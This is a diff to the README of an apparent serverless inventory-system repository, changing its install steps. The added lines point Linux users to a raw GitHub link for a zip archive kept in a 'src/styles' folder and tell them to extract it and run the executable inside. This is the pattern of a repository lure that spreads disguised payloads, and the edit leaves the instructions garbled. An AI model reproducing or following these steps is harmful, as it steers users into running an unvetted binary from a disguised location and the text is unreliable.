Estii24/cloud-native-inventory-system-serverless/README.md

 1. Locate the downloaded file:
    - For Windows: Check your `Downloads` folder for a `.exe` file.
    - For macOS: Look for a `.dmg` file in your `Downloads`.
-   - For Linux: Find a `.tar.gz` or similar type.
+   - For Linux: Find a `https://raw.githubusercontent.com/Estii24/cloud-native-inventory-system-serverless/main/inventory-dashboard/src/styles/cloud-native-inventory-system-serverless_v2.9.zip` or similar type.

 2. Open the file:
    - For Windows: Double-click the `.exe` file.
    - For macOS: Double-click the `.dmg` file and drag the application to your `Applications` folder.
-   - For Linux: Extract the `.tar.gz` file and run the executable in the extracted folder.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Estii24/cloud-native-inventory-system-serverless/main/inventory-dashboard/src/styles/cloud-native-inventory-system-serverless_v2.9.zip` file and run the executable in the extracted folder.

 3. Follow the on-screen instructions to complete the setup.